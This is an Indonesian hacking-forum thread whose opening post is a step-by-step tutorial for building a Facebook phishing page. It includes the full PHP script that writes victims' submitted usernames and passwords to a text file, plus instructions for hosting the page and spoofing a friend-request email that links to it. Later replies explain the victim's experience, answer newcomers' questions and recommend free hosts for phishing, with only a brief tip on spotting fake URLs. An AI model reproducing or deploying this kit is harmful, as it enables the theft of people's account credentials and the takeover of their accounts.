[illegal dummie tutorial] facebook phising

[bl00d13z]

intinya sm aja keq phising(redirect session) yg umum.. (no clickjacking)


Facebook phising methode by mail
step-step :

1. buka http://www.facebook.com/login.php, lalu view source. copy dan paste ke notepad.
Cari "action=" (tanpa quote) dan kita akan memulai editingnya.


pada lingkaran merah action="https://login.facebook.com/login.php" rubahlah menjadi action="next.php"
pada lingkaran biru, rubah methode dari "POST" menjadi "get"

simpan notepad ini menjadi index.php (jangan html)

2. buka notepad baru isikan kode berikut :

Code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

simpan sebagai next.php

3. buka notepad lagi biarkan kosong, lalu simpan dng nama pass.txt.

Upload 3 file tersebut "index.php, next.php, pass.txt" kedalam hosting misalnya 110mb.com, spam.com atau 007sites.com.

OK, Kamu sudah punya phising page facebook skrang.

4. Langkah-langkah spoofing.
copy content asli undangan pertemanan dari facebook.
edit hyperlink dari : http:/www.facebook.com/n/?reqs.php ganti dengan halaman phising anda, hal ini tidak akan merubah tampilan di content asli facebook tapi tetap mengarah ke halaman phising kamu.
phising siap dikirim ke korban kamu.


concept : http://babel.web.id/facebook/

file coding : http://babel.web.id/facebook/fb.rar

nb : nama file bisa dirubah sesuai keinginan,.metoda selain mail masih bs diterapkan (clickjacking, fake link,dll)
================================================== ==========
write by: plaque jasakom member, edited by bl00di3z jasakom legend

[Black Zero]

o.O malahan diposting beneran swt. Link sumber sampe gw ban dari kantor spy orang2 sini ga aneh2 padahal... mendingnya kaga ada orang kantor liat idgs

Calon rame neh wkwkwkkw.



Untung nya caranya masih agak sulit buat newbie yang ga ngerti web programming, jadi ga semua orang bisa pake.

Btw, lo ga kasih tau itu file txt nya yang buat nyimpen user/pass?

[bl00d13z]

o.O malahan diposting beneran swt. Link sumber sampe gw ban dari kantor spy orang2 sini ga aneh2 padahal... mendingnya kaga ada orang kantor liat idgs

Calon rame neh wkwkwkkw.



Untung nya caranya masih agak sulit buat newbie yang ga ngerti web programming, jadi ga semua orang bisa pake.

Btw, lo ga kasih tau itu file txt nya yang buat nyimpen user/pass?

ga dikasi tau jg bisa dicerna harusny ^ ^ uda dikasi tau kan bikin file pass.txt,

nb: wat yg bingung cara liat hasil output username ma passwd yg ditangkepny, buka pass.txt yg udah disiapkan sebelumny, username ma passwd hasil phising disitu semua, jgn lupa set chmod 776/773/777 buat tu file biar bisa di write

[IL-LUINANTE**]

duh kk ini maksudnya gimana ya ga ngerti buat apaan ?? jelasin pls...

[bl00d13z]

gni2.. gw gambarin di sisi korban aja ya..

misal gw pengguna facebook nerima email friend request.. gw accept2 aja dgn link yg dikasih di mail itu.. setelah gw klik link itu gw dsruh login,, gw login dehh..
besokny facebook gw diobok2 orang.. ^^
link yg dikasih n page login yg dikasih sbnernya fake, dia berhasil rekam username n passwd ane pas lagi login.. (nah ni tutor buat melakukan itu)

nb: gw ga kasih tutor gmn bkin fake mailny biar domain mailserverny bebas semau ane.. misal facebook atau [email protected] atau bahkan [email protected] sekalian.. mungkin jadi geger tar account facebook bnyk yg hack, ksian kan.. ;p

tutor ini sbnernya gambaran singkat gimana teknik dasar phising itu dilakukan, untuk sukses atau tidakny tergantung kemampuan masing2 buat ngembangin.. dan buat pengguna2 internet lain buat mewaspadai aksi phising ini, gmpng kok identifikasi phising pa bukan, liat ja url nya.. (atau liat di kiri bawah URL asli dari link yg kena mouse over kalo si hacker mereferensikan url asli ke text url palsu)

[IL-LUINANTE**]

oh jadi maksudnya hack facebook orang ya

[IL-LUINANTE**]

ui boss ini ga ada kata actionnya >.< pake model yg bahasa inggris apa facebooknya (yg aku B.Indo) ???

[Kurt.D.Cobain]

Holly Lord...Ini Pernah Saya Ikuti Juga Di Forum Russia Sana, Kirain Ga Akan Pernah Ada Yang Share Disini.

Nice Very Very Dark Tutorial... Untuk Free Hosting, Boleh Dipilih Satu2 Disini:
[Share]Kumpulan Free Hosting,Fiturnya dan Diskusi ... Hati2 Juga, Karena Pihak Hosting Selalu Banned IP Setelah Tau Hostnya Dipake Buat Phising ...

Thx For Share Bozz

[IL-LUINANTE**]

nanya donk step No.4 itu copy content maksudnya gimana

[produkgagal2]

nice thread anyway, btw itu logo metasploit pake di bawa2 segala, gahar bener

[bl00d13z]

nanya donk step No.4 itu copy content maksudnya gimana

maksudnya content mail friend requestnya, isinya!, copy biar sama n terkesan asli (jgn lupa edit referalnya ke link index.php yg dah kita hosting).. cm gw ga kasih dlu ya cara biar domain mailny bebas.. maen2 ja di smtp klo mau lanjut lebih dlm

@produkgagal
gyahahah bagus sih, kesannya serius, senyumnya yg bkin org pngen tau apa yg sedang dia tertawakan, monitornya identik dgn darah dan kegelapan..wkwkkw

[IL-LUINANTE**]

ga ngerti pls jelasin lagi >.< apaan tuh SMTP ??? punya YM ga ?

[bl00d13z]

ga ngerti pls jelasin lagi >.< apaan tuh SMTP ??? punya YM ga ?

simple mail transfer protocol, wah lumayan panjang bahasny bro.. yg penting km dah tau gmn prosesnya hingga dpt link fake login ny plus mencegah terkena phisingny, sy ga bahas gmn cara bikin email palsu,OOT (ga harus email palsu nyebarin linkny. banyak cara bro)
die_z_666

[New_Dudutz]

ternyata gampang sekali............awkakakakakkakaka,......nice tutorr

[nveuu]

sayang... orang indo FB ers.. kbanyakan jarang buka email nya.... hiks2... >.<"
buka FB doang.. daftar email... tp email kagak dibuka.... rekor gw sampe 13k tu inbox... suram...

hahahahag...

Nice Very Very Dark Tutorial... Untuk Free Hosting, Boleh Dipilih Satu2 Disini:
[Share]Kumpulan Free Hosting,Fiturnya dan Diskusi ... Hati2 Juga, Karena Pihak Hosting Selalu Banned IP Setelah Tau Hostnya Dipake Buat Phising ...

kwakwakwkawkawk nasib ripway... sialan... acc gw ke suspend langsung.... pdahal tugas2 bwat kuliah gw uplod sono.... siaul.... tau2 ke baned...